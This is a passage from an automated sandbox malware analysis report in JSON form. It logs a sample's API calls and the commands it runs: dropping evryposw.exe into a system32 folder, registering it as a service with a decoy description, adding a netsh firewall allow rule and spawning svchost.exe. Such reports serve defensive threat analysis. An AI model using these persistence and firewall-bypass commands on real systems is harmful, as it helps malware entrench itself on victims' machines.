\"evryposw.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004152)\n \"evryposw.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00004152)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter TryEnterCriticalSection (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetCriticalSectionSpinCount (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00004612)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00004612)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter _alldiv (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersInfo (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetIfEntry (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetBestInterface (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00004740)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00004740)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03eac6c@ADVAPI32.dll\"\n \"0e000f00703fac6c@ADVAPI32.dll\"\n \"0e000f00cc3fac6c@ADVAPI32.dll\"\n \"11001200b447ac6c@ADVAPI32.dll\"\n \"110012004848ac6c@ADVAPI32.dll\"\n \"120013008c48ac6c@ADVAPI32.dll\"\n \"12001300e448ac6c@ADVAPI32.dll\"\n \"14001500dc6fac6c@ADVAPI32.dll\"\n \"14001500f46fac6c@ADVAPI32.dll\"\n \"140015000c70ac6c@ADVAPI32.dll\"\n \"170018002470ac6c@ADVAPI32.dll\"\n \"0d000e003c70ac6c@ADVAPI32.dll\"\n \"110012004c70ac6c@ADVAPI32.dll\"\n \"110012006070ac6c@ADVAPI32.dll\"\n \"0d000e003449ac6c@SHELL32.dll\"\n \"0d000e00b049ac6c@SHELL32.dll\"\n \"0f001000a071ac6c@ADVAPI32.dll\"\n \"14001500e071ac6c@ADVAPI32.dll\"\n \"14001500f871ac6c@ADVAPI32.dll\"\n \"0c000d004072ac6c@ADVAPI32.dll\"\n \"0c000d005072ac6c@ADVAPI32.dll\"\n \"0e000f006072ac6c@ADVAPI32.dll\"\n \"0e000f007072ac6c@ADVAPI32.dll\"\n \"0b000c008072ac6c@ADVAPI32.dll\"\n \"14001500b473ac6c@SETUPAPI.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004600)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\fbjtauwa\\\" - (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\evryposw.exe\" %WINDIR%\\system32\\fbjtauwa\\\" - (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create fbjtauwa binPath= \"%WINDIR%\\system32\\fbjtauwa\\evryposw.exe /d\\\"C:\\1391626e285e40ea8a552ef63d\" - (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description fbjtauwa \"wifi internet conection\"\" - (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start fbjtauwa\" - (UID: 00000000-00004600)\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00004600)\n \"evryposw.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00004152)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"evryposw.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"evryposw.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76630000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76630000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76630000\n \"evryposw.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76630000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76630000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76630000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-275", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a named pipe", "description": "\"svchost.exe\" called \"CreateNamedPipeA\" with parameter \"\\\\.\\pipe\\uqyipjlp\"\n 